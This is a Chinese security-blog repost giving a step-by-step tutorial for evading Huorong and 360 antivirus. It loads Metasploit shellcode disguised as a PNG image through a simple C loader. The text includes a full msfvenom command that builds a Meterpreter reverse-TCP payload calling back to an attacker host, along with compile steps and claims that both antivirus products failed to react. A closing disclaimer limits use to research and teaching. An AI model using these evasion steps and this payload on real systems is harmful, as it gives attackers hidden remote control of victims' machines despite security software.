【相关分享】利用c加载图片shellcode免杀

admin
admin
admin
138297
文章
113
评论
2024年5月7日11:31:11评论34 views字数 382阅读1分16秒阅读模式
 

1、实现一个c加载器

上面的加载器用了很简单的实现,没有做任何加密解密的处理,下面的shellcode也不打算做任何加密解密的处理。

2、利用msf生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.174.128 lport=4444 -f raw -o shell.png

这里就是简单生成一个图片shellcode,不涉及加解密。

3、把加载器编译成exe文件

【相关分享】利用c加载图片shellcode免杀

【相关分享】利用c加载图片shellcode免杀

这里先选好32位的release,然后

【相关分享】利用c加载图片shellcode免杀

直接生成解决方案。
【相关分享】利用c加载图片shellcode免杀

得到exe文件
4、运行程序测试效果
火绒静态查杀直接bypass
【相关分享】利用c加载图片shellcode免杀

【相关分享】利用c加载图片shellcode免杀

下面直接尝试在开启火绒的条件下运行,首先msf开启监听:
直接运行:
火绒毫无反应
【相关分享】利用c加载图片shellcode免杀

【相关分享】利用c加载图片shellcode免杀

尝试弹个计算器:
360同理:
【相关分享】利用c加载图片shellcode免杀

【相关分享】利用c加载图片shellcode免杀

【相关分享】利用c加载图片shellcode免杀

 

原文始发于微信公众号(隼目安全):【相关分享】利用c加载图片shellcode免杀

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月7日11:31:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【相关分享】利用c加载图片shellcode免杀https://cn-sec.com/archives/2714169.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息